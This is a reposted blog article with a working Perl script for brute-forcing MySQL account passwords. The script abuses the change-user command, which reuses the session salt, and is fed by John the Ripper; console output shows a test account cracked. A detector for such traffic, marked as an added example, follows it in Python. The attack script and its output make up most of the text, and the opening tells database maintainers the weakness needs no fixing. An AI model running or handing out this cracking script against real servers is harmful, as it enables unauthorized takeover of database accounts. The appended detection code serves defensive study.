Http://www.kankanews.com/ICkengine/archives/212.shtml
Fast MySQL local and remote password cracking!
A first word to database maintainers: you don't have to be nervous and you don't have to fix this problem; it looks like a small mistake.
I found a way to crack MySQL user passwords very efficiently, including those of local users and of users who access the server over the network. In my test, 5,000 passwords per second were tested over the network.
Here's how:
An attacker logs on to the MySQL server with an unprivileged account. MySQL has a command called Change_user which, as the name suggests, changes the user within an existing MySQL session. Because this command executes very quickly, it can be used to test MySQL passwords rapidly instead of reconnecting to the MySQL server for every guess.
Why is the usual approach slow?
The usual way to crack the password is to open a new connection for every guess, and the server sends a different salt each time a connection is made. The Change_user command does not change the salt (which is a weakness), so every guess can reuse the salt of the existing session.
The Perl script below tests candidate passwords generated by John the Ripper.
The test user is Crackme and the password is pass; it is cracked in only a few seconds
(approximately 20 seconds to test 100,000 passwords).
The test script is as follows:
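use Net::MySQL;

$| = 1;    # unbuffered output

# Log in once with the unprivileged account
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'Test',
    user     => "User",
    password => "Secret",
    debug    => 0,
);

$crackuser = "Crackme";

# Read candidate passwords from standard input, one per line
while (<STDIN>) {
    chomp;
    $currentpass = $_;
    # Payload: target user, length byte 0x14, then the candidate password
    # scrambled with the salt of the existing session
    $VV = join "",
        $crackuser,
        "\x14" .
        Net::MySQL::Password->scramble(
            $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
        ) . "";
    # "\x11" is the change-user command byte
    if ($mysql->_execute_command("\x11", $VV) ne undef) {
        print "[*] cracked! --> $currentpass\n";
        exit;
    }
}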
Here are the results of my execution on this machine:
C:\users\kingcope\desktop>c:\users\kingcope\desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning:maxlen = 8 is too large for the current hash type, reduced to 5
words:16382 time:0:00:00:02 w/s: 6262 current:citch
words:24573 time:0:00:00:04 w/s: 4916 current:rap
words:40956 time:0:00:00:07 w/s: 5498 current:matc3
words:49147 time:0:00:00:09 w/s: 5030 current:4429
words:65530 time:0:00:00:12 w/s: 5354 current:ch141
words:73721 time:0:00:00:14 w/s: 5021 current:v3n
words:90104 time:0:00:00:17 w/s: 5277 current:pun2
[*] cracked! --> Pass
words:98295 time:0:00:00:18 w/s: 5434 current:43gs
Session aborted
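An added example, not part of the original post: a defender-side check in Python that counts change-user requests (command byte 0x11, as sent by the script above) per connection in captured client-to-server traffic. The packet framing (3-byte little-endian length, 1-byte sequence id, NUL-terminated user name) follows the MySQL client/server protocol; the function names, the threshold and the sample sessions are constructed for illustration.

```python
from collections import Counter

COM_CHANGE_USER = 0x11  # the command byte the script on this page sends

def packets(stream):
    """Yield (sequence_id, payload) for each MySQL packet in a client-to-server stream."""
    off = 0
    while off + 4 <= len(stream):
        size = int.from_bytes(stream[off:off + 3], "little")  # 3-byte length
        seq, body = stream[off + 3], stream[off + 4:off + 4 + size]
        if len(body) < size:
            return  # truncated capture: stop rather than misparse
        yield seq, body
        off += 4 + size

def change_user_targets(stream):
    """Count change-user requests per target user on one connection."""
    hits = Counter()
    for seq, body in packets(stream):
        # Each command starts a new exchange with sequence id 0; the login
        # reply (sequence id 1) is skipped even if its first byte is 0x11.
        if seq == 0 and body[:1] == bytes([COM_CHANGE_USER]):
            hits[body[1:].split(b"\0", 1)[0].decode("latin-1")] += 1
    return hits

def suspicious(sessions, threshold=5):
    """Return {connection: (user, count)} for users targeted more than threshold times."""
    out = {}
    for conn, stream in sessions.items():
        for user, n in change_user_targets(stream).items():
            if n > threshold:
                out[conn] = (user, n)
    return out

def pkt(seq, body):
    """Build one constructed packet for the sample data below."""
    return len(body).to_bytes(3, "little") + bytes([seq]) + body

# Constructed sample traffic (not a real capture). The 20 zero bytes stand in
# for the scrambled password, whose length byte "\x14" appears in the script.
guess = pkt(0, b"\x11crackme\0\x14" + bytes(20) + b"test\0")
SESSIONS = {
    "10.0.0.5:50112": pkt(1, b"\x11login-reply") + guess * 40,
    "10.0.0.9:41877": pkt(1, b"login-reply") + pkt(0, b"\x03SELECT 1")
                      + pkt(0, b"\x11app\0\x14" + bytes(20) + b"test\0") + pkt(0, b"\x01"),
}

if __name__ == "__main__":
    print(suspicious(SESSIONS))
```

A single change-user request on a connection, as in the second sample session, stays below the threshold; only the session that repeats the command against one account is reported.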
Unless otherwise indicated, articles on this site are original or compiled; when reprinting, please credit: Article from Kengine | Kankanews.com